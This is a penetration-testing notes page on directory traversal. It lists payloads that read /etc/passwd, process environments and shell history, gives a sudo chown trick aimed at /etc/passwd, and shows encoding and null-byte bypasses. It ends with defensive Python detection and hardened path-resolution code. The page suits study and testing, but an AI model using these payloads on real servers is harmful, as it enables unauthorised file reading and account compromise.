A directory traversal (or path traversal) consists of exploiting insufficient validation / sanitization of user-supplied input file names, such that characters representing “traverse to parent directory” (such as ../ or ..\) are passed through to the file APIs.
Directory traversal is a subset of Local File Inclusion (LFI). See difference.
- Testing Directory Traversal/File Include (WSTG-ATHZ-01)
- Root-me – Web Server – Directory Traversal (Protected)
- Directory traversal attack (Wikipedia)
Vulnerability description for reporting available in VulnDB (GitHub)
Examples
Windows
http://someurl.com?filename=..\..\..\windows\win.ini
c:\boot.ini
c:\windows\system32\drivers\etc\hosts
C:\xampp\apache\.htpasswd
Unix
http://someurl.com/../../../../etc/passwd
In HTTP GET request
GET /static/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1
Get environment variables of the current process
http://someurl.com/../../../../proc/self/environ
http://someurl.com/image?id=../proc/self/environ
Operating system details of the victim
http://someurl.com/../../../../proc/version
Current user
http://someurl.com/../../../../proc/self/version
Other info, like processes running
http://someurl.com/../../../../proc/sched_debug
Command history
http://someurl.com/../../../../home/<userid>/.bash_history
http://someurl.com/../../../../home/apache/.bash_history
In cookies
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
In sudo
sudo chown baduser /opt/myapp/myconfig/../../../etc/passwd
Bypass
See Local File Inclusion (LFI) / Remote File Inclusion (RFI) for other bypass ideas.
URI encoded
%2e%2e%2f which translates to ../
%2e%2e/ which translates to ../
..%2f which translates to ../
%2e%2e%5c which translates to ..\
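Added example (not part of the original notes): a small detector for the encoded forms listed above, run over constructed request targets and a cookie value like the GET and Cookie examples earlier on the page. It percent-decodes repeatedly until the string stops changing, so single-encoded (%2e%2e%2f), double-encoded (..%252f) and raw ../ or ..\ sequences all reduce to the same thing before matching; the number of decoding rounds is reported because more than one round is itself a signal worth alerting on. Names such as fully_decode, classify and scan, and the sample inputs, are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Constructed sample values as they might appear in an access log or in request
# headers: request targets plus one cookie value. None of this is real traffic.
SAMPLE_INPUTS = [
    "/static/..%252f..%252f..%252fetc/passwd",           # double-encoded ../
    "/image?id=%2e%2e%2f%2e%2e%2fproc/self/environ",     # single-encoded ../
    "/download?file=..%5c..%5cwindows%5cwin.ini",        # encoded ..\ (Windows)
    "TEMPLATE=../../../../etc/passwd",                   # raw, e.g. a cookie value
    "/static/css/site.css",                              # benign
    "/blog/2024..05..01/post",                           # dots without a separator: benign
]

# ".." immediately followed by a forward or back slash, checked after decoding.
TRAVERSAL = re.compile(r"\.\.[\\/]")


def fully_decode(value, max_rounds=5):
    """Percent-decode until the string stops changing.

    Returns (decoded, rounds). rounds == 0 means nothing was encoded;
    rounds >= 2 means the input was encoded more than once (e.g. %252f),
    which is a strong evasion signal on its own.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def classify(value):
    """Decode one value and report whether it contains a traversal sequence."""
    decoded, rounds = fully_decode(value)
    return {
        "input": value,
        "decoded": decoded,
        "encoding_rounds": rounds,
        "traversal": TRAVERSAL.search(decoded) is not None,
    }


def scan(values):
    """Classify every value; returns a list of dicts in input order."""
    return [classify(v) for v in values]


if __name__ == "__main__":
    for r in scan(SAMPLE_INPUTS):
        flag = "TRAVERSAL" if r["traversal"] else "ok"
        print(f"{flag:9} rounds={r['encoding_rounds']} {r['input']} -> {r['decoded']}")
```

The decode loop is capped so a value that keeps changing (for instance a stored payload of many nested encodings) cannot spin the detector; anything still changing after the cap is worth treating as suspicious in its own right.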
Validation on start of path
The application expects the filename to start with the base folder, such as /var/www/images.
filename=/var/www/images/../../../etc/passwd
File extension is validated
The application expects the filename to end with a specific file extension (e.g. “.png”). Try the null byte.
filename=../../../etc/passwd%00.png
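Added example (not from the original notes): a model of the two checks described in this Bypass section, written to show why a prefix test and an extension test on the raw string fail, beside a hardened resolver. naive_resolve is a constructed stand-in for the weak checks, not a real framework's code; its last line imitates a C-string file API that stops at the first NUL byte, which is what the %00 trick relied on in old PHP versions (Python's own open() rejects embedded NULs). safe_resolve rejects NULs up front, canonicalises with os.path.realpath and then tests containment on the canonical path. Function names and the base directory /var/www/images are assumptions of this example.

```python
import os


def naive_resolve(base_dir, filename, allowed_ext=".png"):
    """Constructed model of the weak checks: prefix and extension tested on the
    RAW string. Bypassed by /var/www/images/../../../etc/passwd (prefix) and by
    a NUL byte before the extension (extension), as the page describes."""
    if not filename.startswith(base_dir):
        raise ValueError("path does not start with base directory")
    if not filename.endswith(allowed_ext):
        raise ValueError("unexpected file extension")
    # Imitates a C-string file API: everything after the first NUL is dropped.
    return filename.split("\x00", 1)[0]


def safe_resolve(base_dir, filename, allowed_ext=".png"):
    """Hardened version: reject NULs, canonicalise, then check containment
    and extension on the canonical path rather than on the raw input."""
    if "\x00" in filename:
        raise ValueError("NUL byte in filename")
    base = os.path.realpath(base_dir)
    # join() discards base when filename is absolute, so absolute input is
    # canonicalised on its own and then subjected to the same containment test.
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory")
    if not candidate.endswith(allowed_ext):
        raise ValueError("unexpected file extension")
    return candidate


def rejects(resolver, base_dir, filename):
    """True if the resolver refuses the filename with a ValueError."""
    try:
        resolver(base_dir, filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    base = "/var/www/images"
    attack = base + "/../../../etc/passwd\x00.png"   # both bypasses combined
    print("naive resolves to:", naive_resolve(base, attack))  # points at /etc/passwd
    print("safe rejects:", rejects(safe_resolve, base, attack))
```

Containment is tested with os.path.commonpath rather than a string prefix, because a prefix test on "/var/www/images" would also accept "/var/www/images2/x.png"; and the test runs after realpath, so symlinks inside the base directory cannot point the canonical path outside it.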